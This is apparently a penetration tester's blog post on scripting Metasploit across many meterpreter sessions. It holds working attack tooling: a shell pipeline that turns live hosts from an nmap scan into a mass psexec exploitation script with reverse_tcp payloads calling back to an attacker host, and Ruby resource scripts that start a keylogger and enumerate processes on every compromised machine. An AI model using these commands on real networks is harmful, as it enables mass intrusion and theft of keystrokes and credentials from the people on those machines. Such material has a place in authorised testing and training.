Running commands on multiple meterpreter sessions

Recently I had a need of launching large number of meterpreter sessions in order to quickly scrape large number of computers. This is what I occasionaly need, but I always forget to document. So, this is also note for myself. Imagine scenario where you have domain admin privileges on large windows network or same exploit working on large number of computers and you want to launch keyboard sniffer on all of them. Another example would be if you want to launch specific command on all (or specific) meterpreter sessions.

Spawning multiple meterpreter sessions

First step would be to get all IP addresses which are active. This is one way to do it:


cat file.gnmap | grep -i "Status: Up" | awk '{ print $2 }' | grep -v -e "my.ip.to.exclude" | xargs -i echo -e "set RHOST {}\nexploit -z" >> /root/mass-exploit.rc

Next step would be launching metasploit and running newly created exploitation script (mass-exploit.rc):


use exploit/windows/smb/psexec_psh
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
resource /root/mass-exploit.rc

Let’s imagine this will spawn many meterpreter sessions 🙂

Executing simple OS commands on multiple meterpreter sessions

Now, if we just want to run specific OS command on all meterpreter sessions, we can simply say:


sessions -c netstat

And it will try to execute netstat on all meterpreter sessions. You can also specify on which session with -i. This specific command helps in situation where you need to know who accesses what or who might have access to specific IP address on subnet.

Executing keyboard sniffing on all meterpreter sessions

Of course, this was quite simple. But what if I want to run keyboard sniffing on all meterpreter sessions I have? It’s quite simple as well. You need to select right post module and execute it as job (with -j).

First you need to have resource file again (runall-jobs.rc):


<ruby>
framework.sessions.each do |num,session|
run_single("set SESSION #{num}")
print_status("Running #{active_module.fullname} against session #{num}")
run_single("run -j")
sleep 1
end
</ruby>

After that, it is almost same as last time. You need to set starting parameters of post modules and run above resource file in order to execute it on all meterpreter sessions:


use post/windows/capture/keylog_recorder
set MIGRATE true
resource /root/runall-jobs.rc

Enumerating processes on multiple meterpreter sessions

Next example would be if enumerating processes is needed on multiple meterpreter sessions. It’s similar, but this time as an example I won’t be using any modules. Just plain old Ruby.

Take following code and save it as psenum.rc:


<ruby>
framework.sessions.each do |num,session|
print_status("Running process enumeration against session #{num}")
session.sys.process.get_processes().each do |x|
print_status(" #{num} = Process: #{x['pid']} #{x['name']}")
end
end
</ruby>

And just run it inside Metasploit command shell:


resource /root/psenum.rc

You just got process names and PIDs from all meterpreter sessions.

Final notes

As you can see running commands, enumerating or scripting across multiple meterpreter sessions is quick and easy. Hope this post will help you to get up to speed if you did not know this before.

Note that I have tried to use post/multi/manage/multi_post but it did not work for me on newer/latest versions of metasploit.

References

Of course, I’m not the first who needed that. There are blog posts from 2010 explaining some bits and pieces, so I hope they will help you as well. They helped me every time I had to refresh my memory:

https://khr0x40sh.wordpress.com/2013/11/13/meterpreter-as-a-botnet-part-1-why-not-with-some-p-sprinkled-in/
http://www.room362.com/blog/2011/11/01/run-post-modules-on-all-sessions/
http://www.darkoperator.com/blog/2011/7/13/automating-post-modules-and-meterpreter-across-sessions.html
https://offensiveinfosec.wordpress.com/tag/autorunscript/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: